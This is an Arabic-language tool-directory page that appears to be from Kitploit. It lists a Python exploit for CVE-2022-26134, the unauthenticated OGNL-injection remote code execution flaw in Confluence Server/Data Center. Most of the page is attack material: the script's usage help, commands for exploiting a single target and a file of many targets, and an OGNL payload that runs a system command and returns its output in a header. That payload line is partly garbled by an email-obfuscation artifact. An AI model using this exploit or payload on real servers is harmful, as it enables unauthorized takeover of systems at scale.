Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-CVE-2022-26134 — أداة استغلال بلغة Python لثغرة RCE (تنفيذ أوامر عن بُعد) قبل المصادقة في Confluence Server/Data Center عبر حقن OGNL (CVE-2022-26134). تدعم التنفيذ على أهداف مفردة ومتعددة مع حقن الأوامر والمسح متعدد الخيوط. | Kitploit
أدوات/GitHubGitHub/darkstuff-lab/-cve-2022-26134
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubdarkstuff-lab/-cve-2022-26134

-CVE-2022-26134

أداة استغلال بلغة Python لثغرة RCE (تنفيذ أوامر عن بُعد) قبل المصادقة في Confluence Server/Data Center عبر حقن OGNL (CVE-2022-26134). تدعم التنفيذ على أهداف مفردة ومتعددة مع حقن الأوامر والمسح متعدد الخيوط.

عرض المستودع
منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134)

تنفيذ التعليمات البرمجية عن بُعد بدون مصادقة في Confluence عبر حقن OGNL (CVE-2022-26134)

  • في 2 يونيو 2022، أصدرت Atlassian إعلانًا أمنيًا لتطبيقات Confluence Server وData Center، مشيرةً إلى ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد بدون مصادقة. تسمح ثغرة حقن OGNL لمستخدم غير مصادق بتنفيذ تعليمات برمجية عشوائية على مثيل Confluence Server أو Data Center.

هام

هذا الاستغلال مخصص فقط لتسهيل توضيح الثغرة من قبل الباحثين. لا أوصي بأي إجراءات غير قانونية ولا أتحمل أي مسؤولية عن أي استخدام ضار لهذا السكريبت.

• مثال الطلب

BurpRequest

استخدام الاستغلال

root@kitploit:~
python3 exploit.py -h
Usage: exploit.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL, --url=URL     Base target uri (ex. http://target-uri/)
  -f FILEHOSTS, --file=FILEHOSTS
                        example.txt
  -t THREADS_SET, --threads=THREADS_SET
  -m TIMEOUT, --maxtimeout=TIMEOUT
  -o OUTPUT, --output=OUTPUT
  -c COMMAND, --cmd=COMMAND

استغلال هدف واحد:

$ python3 exploit.py -u http://xxxxx.com -c id

xpl1

استغلال أهداف متعددة

$ python3 exploit.py -f urls.txt -p -c id

xpl2

تعبير OGNL

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

المراجع:

• https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

• https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis

تنزيل الأداة